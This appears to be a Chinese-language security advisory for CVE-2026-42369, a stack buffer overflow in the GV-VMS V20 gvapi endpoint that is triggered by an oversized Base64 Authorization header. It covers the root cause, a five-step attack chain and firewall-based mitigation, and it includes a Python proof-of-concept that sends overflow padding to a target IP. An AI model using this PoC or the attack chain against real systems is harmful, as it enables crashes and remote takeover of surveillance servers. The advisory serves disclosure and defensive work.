CVE-2026-42369 CVSS 10.0 严重

CVE-2026-42369 GV-VMS V20 栈溢出漏洞

披露日期: 2026-05-04

来源: 0df08a0e-a200-4957-9bb0-084f562506f9

漏洞信息

漏洞编号

CVE-2026-42369

漏洞类型

栈溢出

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

GV-VMS V20

漏洞概述

GV-VMS V20是一款集成了多种安全设备管理的视频监控软件。其WebCam Server组件存在严重的栈溢出漏洞。攻击者可利用`gvapi`端点在处理HTTP Authorization头时的逻辑缺陷，发送超长的Base64编码字符串。由于解码后拷贝至栈缓冲区时未进行长度校验，导致缓冲区溢出。鉴于该服务未开启ASLR保护，攻击者极易实现远程代码执行，获取系统最高权限。

技术细节

漏洞根源在于GV-VMS V20 Web服务器对`gvapi`接口的认证处理。程序解析HTTP Authorization头中的Base64凭证后，将其逐字节复制到固定大小（256字节）的栈缓冲区`Buffer`中。关键代码路径处缺失了边界检查机制。当解码后的字符串长度超过256字节时，多余数据将覆盖栈上的返回地址等关键数据。由于该二进制文件编译时未启用ASLR，攻击者可以精确控制跳转地址，部署Shellcode。结合CVSS v3.1评分10.0，该漏洞允许无认证的攻击者通过网络直接触发溢出，并在服务器端以SYSTEM权限执行任意命令，完全接管系统。

攻击链分析

STEP 1

侦察

扫描网络发现开放Web服务的GV-VMS V20设备，确认WebCam Server功能已启用。

STEP 2

构造载荷

创建一段长度超过256字节的恶意数据，并进行Base64编码，填充Authorization Header。

STEP 3

发送请求

向目标服务器的`gvapi`端点发送包含恶意Authorization头的HTTP请求。

STEP 4

触发溢出

服务器解码数据并尝试将其复制到栈缓冲区，由于未检查长度，触发栈溢出，覆盖返回地址。

STEP 5

执行代码

利用程序未开启ASLR的弱点，控制程序执行流程，跳转至恶意Shellcode，以SYSTEM权限执行任意命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import base64
import requests

def exploit(target_ip):
    # Construct a large payload to overflow the 256-byte buffer
    # Padding with 'A's to overwrite the return address
    payload = 'A' * 300
    
    # Encode the payload in Base64 as required by the endpoint
    encoded_payload = base64.b64encode(payload.encode()).decode()
    
    # The gvapi endpoint expects Basic Auth
    # Format: "Basic <base64_creds>"
    malicious_header = f"Basic {encoded_payload}"
    
    url = f"http://{target_ip}/gvapi"
    headers = {
        "Authorization": malicious_header
    }
    
    try:
        print(f"[+] Sending payload to {url}...")
        response = requests.get(url, headers=headers, timeout=5)
        # If the service crashes, we might not get a response, or a 500 error
        print(f"[+] Response status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed (Service likely crashed): {e}")

if __name__ == "__main__":
    target = "192.168.1.100" # Replace with actual target IP
    exploit(target)

影响范围

GV-VMS V20

防御指南

临时缓解措施

当前针对此漏洞的最佳缓解措施是限制对GV-VMS Web服务的网络访问，利用防火墙规则阻断外部对`/gvapi`端点的访问。同时，应监控服务进程的异常崩溃情况。建议用户尽快关注厂商公告并进行版本升级，修复未开启ASLR及缺乏边界检查的底层代码问题。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表